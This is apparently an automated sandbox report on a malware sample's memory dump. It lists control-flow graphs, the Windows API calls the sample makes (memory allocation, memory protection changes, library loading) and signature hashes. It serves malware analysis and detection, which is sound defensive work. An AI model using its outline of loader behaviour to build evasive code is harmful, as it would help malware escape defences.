745->747 746->572 748 571f4c-571fb8 746->748 747->729 760 571fbd-571fd1 748->760 756 571a69-571a79 749->756 750->756 757 571a4e-571a68 750->757 751->726 758 572230-572244 751->758 762 571a7f-571a96 756->762 763 571c2d-571c44 756->763 757->756 758->726 761 57224a-57227e 758->761 767 5720a7-5720e0 760->767 768 571fd7-571ff1 760->768 761->726 769 572284-5722f0 761->769 762->763 770 571a9c-571b0e 762->770 765 571d64-571da8 763->765 766 571c4a-571cd0 763->766 765->732 775 571dae-571dec call 5723e2 765->775 766->765 780 571cd6-571d61 766->780 767->760 778 5720e6-57216c call 5723e2 767->778 773 571ff3-57200a 768->773 774 57201c-572084 768->774 784 5722f5-57230e 769->784 785 571b0f-571b3f 770->785 773->635 781 572010-57201a 773->781 774->767 775->665 780->765 781->774 789 572088-5720a6 781->789 790 572310-57237a 784->790 791 57237b-5723ae 784->791 785->785 792 571b41-571bdb 785->792 789->767 790->791 791->784 797 5723b4 791->797 792->785 803 571be1-571c20 792->803 797->734 799->612 802 56b08f-56b1e5 call 572acd 799->802 802->635 809 56b1eb-56b20b 802->809 803->785 805 571c26-571c2a 803->805 805->763 809->685 810 56b211-56b3f2 call 56b2fb 809->810 810->572 816 56b3f8-56b554 call 572acd 810->816 816->685 821 56b55a-56b597 816->821 821->685 822 56b59d-56b604 821->822 824 56b606-56b63b 822->824 825 56b641-56b64a 822->825 824->685 824->825 825->593 826 56b650-56b66e 825->826 826->685 827 56b674-56b68f 826->827 827->593 828 56b695-56b8b7 call 56f944 827->828 828->685 834 56b8bd-56b9ea call 57374d 828->834 834->685 840 56b9f0-56baba call 572acd 834->840 840->685 844 56bac0-56bb82 call 572acd 840->844 844->685 848 56bb84-56bbde 844->848 848->567 850 56bbe4-56bbfd call 572acd 848->850
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 1029625771-1197094480
                                                                                                                          • Opcode ID: 82915853cc823b39f77a4ebf5ea4c2710b2b522bee9262211b365f458a48c437
                                                                                                                          • Instruction ID: 2cbbea7bca7ffd11db10f875e6770a580d11d4af5b5b0b0b4772a5f387146c35
                                                                                                                          • Opcode Fuzzy Hash: 82915853cc823b39f77a4ebf5ea4c2710b2b522bee9262211b365f458a48c437
                                                                                                                          • Instruction Fuzzy Hash: 60C2357160434A9FDF349E34CDA57EE3BA2FF55390F95852ADC8A9B254D3308986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: );J$EK]
                                                                                                                          • API String ID: 0-1158390361
                                                                                                                          • Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction ID: 3f7655a3a4547983acea0519667cdc86175e01c8c82dee460008b03e70238bcf
                                                                                                                          • Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction Fuzzy Hash: DAB17C30A04349CFDF389E34D9A47EA3BA2FF55350F59851ACC8E8B655D7318A82EB01
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1137 56c88b-56c8a0 1138 56c8a6-56c954 1137->1138 1139 56cbe8-56cd65 call 56f32f call 56cc7e 1137->1139 1143 56f3ee-56f4b1 1138->1143 1144 56c95a-56ca12 call 56f3ee 1138->1144 1139->1143 1148 56f4e4-56f4e9 LoadLibraryA 1143->1148 1149 56f4b3-56f4e1 call 56fcc1 call 56f542 1143->1149 1159 56a574-56a80f call 571490 call 56a760 1144->1159 1160 56ca18-56cae3 call 56ca93 1144->1160 1153 56f533-56f53d call 56f542 1148->1153 1149->1148 1159->1143 1179 56a815-56a841 1159->1179 1160->1159 1173 56cae9-56cb18 1160->1173 1173->1159 1175 56cb1e-56cbe6 NtAllocateVirtualMemory 1173->1175 1175->1139 1180 56a847-56a8fa 1179->1180 1181 561320-5734e0 call 5610c0 call 560561 1179->1181 1184 56a900-56aa86 call 56f3ca call 572acd 1180->1184 1185 57374d-573755 1180->1185 1200 5734e6-57353b 1181->1200 1201 5736ca-573733 1181->1201 1205 56aa8b-56aac7 1184->1205 1206 56aa86 call 572acd 1184->1206 1189 573756-57378f 1185->1189 1189->1189 1190 573791-5737e0 1189->1190 1200->1201 1207 573541-573545 1200->1207 1208 56bbfe-56bd48 call 572acd * 3 1205->1208 1209 56aacd-56afd9 call 56f3ee call 572acd call 56bd4b call 56f313 call 572acd 1205->1209 1206->1205 1207->1201 1211 57354b-57354f 1207->1211 1208->1143 1209->1208 1250 56afdf-56b089 1209->1250 1211->1201 1214 573555-573559 1211->1214 1214->1201 1217 57355f-573563 1214->1217 1217->1201 1221 573569-57356d 1217->1221 1221->1201 1224 573573-573581 1221->1224 1224->1201 1227 573587-5735e8 1224->1227 1233 5735e9-5735fd 1227->1233 1235 573672-573689 1233->1235 1236 5735ff-573603 1233->1236 1235->1181 1239 57368f-5736b2 1235->1239 1236->1201 1240 573609-573615 1236->1240 1240->1181 1241 57361b-573669 1240->1241 1241->1233 1250->1143 1252 56b08f-56b1e5 call 572acd 1250->1252 1252->1181 1257 56b1eb-56b20b 1252->1257 1257->1208 1258 56b211-56b3f2 call 56b2fb 1257->1258 1264 56138e-561464 call 5737e8 1258->1264 1265 56b3f8-56b554 call 572acd 1258->1265 1275 561466-561497 1264->1275 1276 5614dd-561502 1264->1276 1265->1208 1274 56b55a-56b597 1265->1274 1274->1208 1279 56b59d-56b604 1274->1279 1275->1159 1277 561517-561518 1276->1277 1278 561572-561578 1276->1278 1277->1278 1280 561579-561594 1278->1280 1283 56b606-56b63b 1279->1283 1284 56b641-56b64a 1279->1284 1280->1277 1282 561596-5615a6 1280->1282 1285 5615b6-5615b9 1282->1285 1286 5615a9-5615b4 1282->1286 1283->1208 1283->1284 1284->1159 1287 56b650-56b66e 1284->1287 1285->1280 1288 5615bb-5715f9 call 56f3ee * 2 call 5737e8 GetPEB call 5723e2 1285->1288 1286->1285 1287->1208 1289 56b674-56b68f 1287->1289 1312 571df1-571e3a 1288->1312 1313 5715ff-5716a1 1288->1313 1289->1159 1290 56b695-56b8b7 call 56f944 1289->1290 1290->1208 1302 56b8bd-56b9ea call 57374d 1290->1302 1302->1208 1316 56b9f0-56baba call 572acd 1302->1316 1313->1264 1318 5716a7-571838 1313->1318 1316->1208 1325 56bac0-56bb82 call 572acd 1316->1325 1326 57183c-57184d 1318->1326 1325->1208 1337 56bb84-56bbde 1325->1337 1328 571853-571863 1326->1328 1329 571e40-571e54 1326->1329 1328->1326 1332 571865-571892 1328->1332 1331 571e58-571e6d 1329->1331 1334 571e73-571eac 1331->1334 1335 572172-572187 1331->1335 1332->1326 1336 571894-5718aa 1332->1336 1334->1331 1338 571eae-571ec5 1334->1338 1335->1264 1341 57218d-57218e 1335->1341 1336->1326 1339 5718ac-571920 1336->1339 1337->1185 1345 56bbe4-56bbfd call 572acd 1337->1345 1338->1331 1343 571ec7-571f29 1338->1343 1346 571922-57199c 1339->1346 1342 572192-5721a1 1341->1342 1348 5721a7-572219 1342->1348 1349 5723b6-5723dd call 5723e2 1342->1349 1343->1331 1355 571f2f-571f46 1343->1355 1357 5719a2-5719e7 1346->1357 1358 571a39-571a4c 1346->1358 1348->1264 1359 57221f-57222a 1348->1359 1355->1264 1356 571f4c-571fb8 1355->1356 1365 571fbd-571fd1 1356->1365 1362 571a69-571a79 1357->1362 1358->1362 1363 571a4e-571a68 1358->1363 1359->1342 1364 572230-572244 1359->1364 1367 571a7f-571a96 1362->1367 1368 571c2d-571c44 1362->1368 1363->1362 1364->1342 1366 57224a-57227e 1364->1366 1371 5720a7-5720e0 1365->1371 1372 571fd7-571ff1 1365->1372 1366->1342 1373 572284-5722f0 1366->1373 1367->1368 1374 571a9c-571b0e 1367->1374 1369 571d64-571da8 1368->1369 1370 571c4a-571cd0 1368->1370 1369->1346 1378 571dae-571dec call 5723e2 1369->1378 1370->1369 1382 571cd6-571d61 1370->1382 1371->1365 1381 5720e6-57216c call 5723e2 1371->1381 1376 571ff3-57200a 1372->1376 1377 57201c-572084 1372->1377 1386 5722f5-57230e 1373->1386 1387 571b0f-571b3f 1374->1387 1376->1181 1383 572010-57201a 1376->1383 1377->1371 1378->1312 1382->1369 1383->1377 1390 572088-5720a6 1383->1390 1391 572310-57237a 1386->1391 1392 57237b-5723ae 1386->1392 1387->1387 1393 571b41-571bdb 1387->1393 1390->1371 1391->1392 1392->1386 1397 5723b4 1392->1397 1393->1387 1400 571be1-571c20 1393->1400 1397->1349 1400->1387 1401 571c26-571c2a 1400->1401 1401->1368
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0056CBC8
                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                          • String ID: U=b
                                                                                                                          • API String ID: 2616484454-117013522
                                                                                                                          • Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction ID: 3ef18e08b5a3f845fcd61d351520893dd6cedf6b16431fadf5f561777080bf1f
                                                                                                                          • Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction Fuzzy Hash: 45814B71A0035BDFDF349E689DA43EA3AB2BF95390F94413ADC899B254D7318E81CB11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1402 571161-57117b 1403 571181-5711be 1402->1403 1403->1403 1404 5711c0-571213 1403->1404 1406 56138e-561464 call 5737e8 1404->1406 1407 571219-571275 1404->1407 1418 561466-561497 1406->1418 1419 5614dd-561502 1406->1419 1407->1406 1411 57127b-5712ad 1407->1411 1413 5712b3-571343 1411->1413 1414 56f3ee-56f4b1 1411->1414 1437 57374d-573755 1413->1437 1422 56f4e4-56f53d LoadLibraryA call 56f542 1414->1422 1423 56f4b3-56f4e1 call 56fcc1 call 56f542 1414->1423 1425 56a574-56a80f call 571490 call 56a760 1418->1425 1420 561517-561518 1419->1420 1421 561572-561578 1419->1421 1420->1421 1426 561579-561594 1421->1426 1423->1422 1425->1414 1455 56a815-56a841 1425->1455 1426->1420 1431 561596-5615a6 1426->1431 1438 5615b6-5615b9 1431->1438 1439 5615a9-5615b4 1431->1439 1445 573756-57378f 1437->1445 1438->1426 1443 5615bb-5715f9 call 56f3ee * 2 call 5737e8 GetPEB call 5723e2 1438->1443 1439->1438 1479 571df1-571e3a 1443->1479 1480 5715ff-5716a1 1443->1480 1445->1445 1446 573791-5737e0 1445->1446 1457 56a847-56a8fa 1455->1457 1458 561320-5734e0 call 5610c0 call 560561 1455->1458 1457->1437 1463 56a900-56aa86 call 56f3ca call 572acd 1457->1463 1482 5734e6-57353b 1458->1482 1483 5736ca-573733 1458->1483 1490 56aa8b-56aac7 1463->1490 1491 56aa86 call 572acd 1463->1491 1480->1406 1489 5716a7-571838 1480->1489 1482->1483 1492 573541-573545 1482->1492 1506 57183c-57184d 1489->1506 1494 56bbfe-56bd48 call 572acd * 3 1490->1494 1495 56aacd-56afd9 call 56f3ee call 572acd call 56bd4b call 56f313 call 572acd 1490->1495 1491->1490 1492->1483 1497 57354b-57354f 1492->1497 1494->1414 1495->1494 1603 56afdf-56b089 1495->1603 1497->1483 1501 573555-573559 1497->1501 1501->1483 1505 57355f-573563 1501->1505 1505->1483 1510 573569-57356d 1505->1510 1511 571853-571863 1506->1511 1512 571e40-571e54 1506->1512 1510->1483 1515 573573-573581 1510->1515 1511->1506 1517 571865-571892 1511->1517 1516 571e58-571e6d 1512->1516 1515->1483 1520 573587-5735e8 1515->1520 1521 571e73-571eac 1516->1521 1522 572172-572187 1516->1522 1517->1506 1523 571894-5718aa 1517->1523 1533 5735e9-5735fd 1520->1533 1521->1516 1527 571eae-571ec5 1521->1527 1522->1406 1529 57218d-57218e 1522->1529 1523->1506 1528 5718ac-571920 1523->1528 1527->1516 1534 571ec7-571f29 1527->1534 1536 571922-57199c 1528->1536 1530 572192-5721a1 1529->1530 1537 5721a7-572219 1530->1537 1538 5723b6-5723dd call 5723e2 1530->1538 1540 573672-573689 1533->1540 1541 5735ff-573603 1533->1541 1534->1516 1550 571f2f-571f46 1534->1550 1553 5719a2-5719e7 1536->1553 1554 571a39-571a4c 1536->1554 1537->1406 1555 57221f-57222a 1537->1555 1540->1458 1548 57368f-5736b2 1540->1548 1541->1483 1549 573609-573615 1541->1549 1549->1458 1551 57361b-573669 1549->1551 1550->1406 1552 571f4c-571fb8 1550->1552 1551->1533 1564 571fbd-571fd1 1552->1564 1560 571a69-571a79 1553->1560 1554->1560 1561 571a4e-571a68 1554->1561 1555->1530 1562 572230-572244 1555->1562 1566 571a7f-571a96 1560->1566 1567 571c2d-571c44 1560->1567 1561->1560 1562->1530 1565 57224a-57227e 1562->1565 1571 5720a7-5720e0 1564->1571 1572 571fd7-571ff1 1564->1572 1565->1530 1573 572284-5722f0 1565->1573 1566->1567 1574 571a9c-571b0e 1566->1574 1569 571d64-571da8 1567->1569 1570 571c4a-571cd0 1567->1570 1569->1536 1579 571dae-571dec call 5723e2 1569->1579 1570->1569 1584 571cd6-571d61 1570->1584 1571->1564 1582 5720e6-57216c call 5723e2 1571->1582 1577 571ff3-57200a 1572->1577 1578 57201c-572084 1572->1578 1588 5722f5-57230e 1573->1588 1589 571b0f-571b3f 1574->1589 1577->1458 1585 572010-57201a 1577->1585 1578->1571 1579->1479 1584->1569 1585->1578 1593 572088-5720a6 1585->1593 1594 572310-57237a 1588->1594 1595 57237b-5723ae 1588->1595 1589->1589 1596 571b41-571bdb 1589->1596 1593->1571 1594->1595 1595->1588 1601 5723b4 1595->1601 1596->1589 1607 571be1-571c20 1596->1607 1601->1538 1603->1414 1606 56b08f-56b1e5 call 572acd 1603->1606 1606->1458 1613 56b1eb-56b20b 1606->1613 1607->1589 1609 571c26-571c2a 1607->1609 1609->1567 1613->1494 1614 56b211-56b3f2 call 56b2fb 1613->1614 1614->1406 1620 56b3f8-56b554 call 572acd 1614->1620 1620->1494 1625 56b55a-56b597 1620->1625 1625->1494 1626 56b59d-56b604 1625->1626 1628 56b606-56b63b 1626->1628 1629 56b641-56b64a 1626->1629 1628->1494 1628->1629 1629->1425 1630 56b650-56b66e 1629->1630 1630->1494 1631 56b674-56b68f 1630->1631 1631->1425 1632 56b695-56b8b7 call 56f944 1631->1632 1632->1494 1638 56b8bd-56b9ea call 57374d 1632->1638 1638->1494 1644 56b9f0-56baba call 572acd 1638->1644 1644->1494 1648 56bac0-56bb82 call 572acd 1644->1648 1648->1494 1652 56bb84-56bbde 1648->1652 1652->1437 1654 56bbe4-56bbfd call 572acd 1652->1654
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: EK]
                                                                                                                          • API String ID: 0-1532622298
                                                                                                                          • Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction ID: 7f2c824bc979e4107e2b7bf8adf9b110f1ab5535bc9a2088fec85385654fbe56
                                                                                                                          • Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction Fuzzy Hash: AE61AC71A003499FDF359E7489A43DB3BA6FF963A0F65492ADC46CB701D7318986C701
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1657 56ffed-56fff4 call 570391 1660 56fffa-57008e 1657->1660 1662 570090-57013c call 5702dc 1660->1662 1666 57013e-57014a 1662->1666 1667 57014c-5701d8 1662->1667 1666->1667 1667->1662 1669 5701de-5701ea 1667->1669 1669->1660 1670 5701f0-570231 1669->1670 1671 570237-570243 1670->1671 1672 56f3ee-56f4b1 1670->1672 1671->1660 1674 570249-570280 1671->1674 1676 56f4e4-56f53d LoadLibraryA call 56f542 1672->1676 1677 56f4b3-56f4e1 call 56fcc1 call 56f542 1672->1677 1674->1660 1675 570286-5702d8 1674->1675 1677->1676
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-1850852036
                                                                                                                          • Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction ID: f0051739ee9f5ead7fa6c460bb19291342acc587674e0e2bcc116909637407d5
                                                                                                                          • Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction Fuzzy Hash: ED516B76A0035ADBCF345E299E683DA37A2FFE13A0FDA402ACC4E97201C7304985D741
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1686 563ce1-563cef 1687 563d31-563d36 1686->1687 1688 563d0f-563d10 1687->1688 1689 563d38-563d3e 1687->1689 1691 563d2f-563d30 1688->1691 1690 563d40-563d56 1689->1690 1692 563daf-563db3 NtProtectVirtualMemory 1690->1692 1693 563d58-563d5d 1690->1693 1691->1687 1694 563cfe-563d00 1691->1694 1696 563dbb 1692->1696 1693->1691 1695 563d5f-563d98 1693->1695 1698 563d02 1694->1698 1699 563c9f-563cab 1694->1699 1695->1696 1705 563d9a-563d9f 1695->1705 1696->1690 1700 563dbd-563e46 1696->1700 1698->1688 1699->1686 1704 563e48-563ef0 1700->1704 1709 563ef6-563f28 1704->1709 1707 563da2-563dae 1705->1707 1708 563da1 1705->1708 1707->1692 1708->1707
                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 00563DAF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 3bfab089e0a8e921a3d477f1633c910392c34ba205763c3e8f51b3710357ae60
                                                                                                                          • Instruction ID: 815a7e42fffba584ecc8aa1ab58a73cedfe24da399ac82aa319bdbcc8ef843ff
                                                                                                                          • Opcode Fuzzy Hash: 3bfab089e0a8e921a3d477f1633c910392c34ba205763c3e8f51b3710357ae60
                                                                                                                          • Instruction Fuzzy Hash: 8041CC715083828FDB159E3489683EA3FD5AF613A0F694B6EC866CB5D2C7368903C701
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1812 563e0e-563e10 1813 563e12-563e46 1812->1813 1814 563daf-563db3 NtProtectVirtualMemory 1812->1814 1815 563e48-563ef0 1813->1815 1816 563dbb 1814->1816 1820 563ef6-563f28 1815->1820 1818 563d40-563d56 1816->1818 1819 563dbd-563dd0 1816->1819 1818->1814 1821 563d58-563d5d 1818->1821 1819->1813 1822 563d2f-563d30 1821->1822 1823 563d5f-563d98 1821->1823 1824 563d31-563d36 1822->1824 1825 563cfe-563d00 1822->1825 1823->1816 1834 563d9a-563d9f 1823->1834 1827 563d0f-563d10 1824->1827 1828 563d38-563d3e 1824->1828 1830 563d02 1825->1830 1831 563c9f-563cef 1825->1831 1827->1822 1828->1818 1830->1827 1831->1824 1835 563da2-563dae 1834->1835 1836 563da1 1834->1836 1835->1814 1836->1835
                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 00563DAF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 5a26d430a2d090a820bf4f5314116ffd24961de1c209c8b2da92f1e55e77e4ed
                                                                                                                          • Instruction ID: 23d7aa219f351d074db8552830d230c8a808649600816b93fb4f1542e1a3ca84
                                                                                                                          • Opcode Fuzzy Hash: 5a26d430a2d090a820bf4f5314116ffd24961de1c209c8b2da92f1e55e77e4ed
                                                                                                                          • Instruction Fuzzy Hash: 7811C5620187825ED725ED3445683E66FC65F62360F598B4ECCA59B8D2C63785438101
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1850 5723e2-5724f9 NtProtectVirtualMemory
                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,005715C1,12BC0BD0,0056A728), ref: 005724F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction ID: 7bec9491bcebd8e26602e5db64857fecd65b64fe27260b38cb10d9b195377669
                                                                                                                          • Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction Fuzzy Hash: 790171746043558FDF30CE68C8D87DA7695FB8D700F81412AAD4D5B305C6715E89CB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
                                                                                                                          • Instruction ID: a00baf8296fbb468db3daf362860aa2f7f1454433f10f95d11190ab9ac975d69
                                                                                                                          • Opcode Fuzzy Hash: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
                                                                                                                          • Instruction Fuzzy Hash: 1990027130150402D550B159450478A405947D0701FD1C519A9158D14EC6698DD57A65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
                                                                                                                          • Instruction ID: bb6a4024f2017a34cfc1f4814ae16b068fc93babc8f020a9c9338f631b269f39
                                                                                                                          • Opcode Fuzzy Hash: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
                                                                                                                          • Instruction Fuzzy Hash: 0D90023130150413D521A159460474B405D47D0741FD1C91AA4518D18DD6668952B521
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1858 1e8f2b90-1e8f2b9c LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
                                                                                                                          • Instruction ID: 4b742aeb5026e91c5a9a33e210505aa15ab5721915a6c4c57b21e789e4e78218
                                                                                                                          • Opcode Fuzzy Hash: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
                                                                                                                          • Instruction Fuzzy Hash: A290023130158802D520A159850478E405947D0701FD5C919A8518E18DC6A588917521
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1857 1e8f2b10-1e8f2b1c LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                          • Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
                                                                                                                          • Instruction ID: b1c29bfbe79d8c591d80c50f712eb090dd4a7910186f19a6a26d8553c4164bc6
                                                                                                                          • Opcode Fuzzy Hash: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
                                                                                                                          • Instruction Fuzzy Hash: F990023130150802D590B159450468E405947D1701FD1C51DA4119E14DCA258A597BA1
